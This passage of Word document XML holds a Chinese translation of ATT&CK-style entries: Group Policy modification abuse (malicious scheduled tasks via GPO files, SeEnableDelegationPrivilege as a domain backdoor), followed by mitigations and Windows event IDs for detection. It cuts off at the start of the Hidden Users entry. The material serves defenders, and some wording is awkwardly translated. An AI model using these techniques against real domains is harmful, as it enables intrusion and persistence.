        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>环境中如此多的用户和计算机设置，因此存在大量潜在的攻击，这些攻击可能源于此</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>滥用。可以利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> New-GPO"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>紧急任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>等公开脚本，通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>设置（在此情况下修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;GPO_PATH&gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>来自动创建恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在某些情况下，攻击者可能会修改特定的用户权限，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> seEnableDelegationPrivilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>&lt;GPO_PATH&gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，以实现一个微妙的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>后门，并完全控制域，因为用户然后，在攻击者的控制下的帐户将能够修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6CC4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2ED351" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="8044"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="24F13D04" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5B6DAD41" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="199C86EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="67472C19" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BE9326" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00845082">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B200AB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00403881" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="4F7CAC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bloodhound</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>（版本</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.5.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>及更高版本）识别和纠正</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> GPO </w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>权限滥用机会（例如：</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve">GPO </w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>修改权限）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="7ED7D7D9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3073A854" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00845082">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>用户账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600D71E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>请考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> WMI </w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>和安全筛选，以进一步定制</w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> GPO </w:t>
            </w:r>
            <w:r w:rsidRPr="00403881">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>将应用于哪些用户和计算机。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3980A8BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5BC04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00403881" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件日志监视目录服务更改，可以检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改。对于此类</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改，可以记录几个事件，包括：</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">5136 </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录服务对象被修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>5137</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已创建目录服务对象事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve">5138 </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录服务对象未删除事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID 5139</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录服务对象已移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aff2"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>ID 5141</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录服务对象已删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AB420" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滥用通常伴随着一些其他行为，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00845082">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中将具有与其关联的事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于被</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测。后续权限值修改（如对</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SeEnableDelegationPrivilege </w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的修改）也可以在与分配给新登录的权限（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 4672</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和用户权限分配（事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 4704</w:t>
      </w:r>
      <w:r w:rsidRPr="00403881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）关联的事件中搜索。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD2530" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0865">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏用户</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6426AB12" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34887C21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> T1147</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730EC1B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182AB7D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39DB80A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
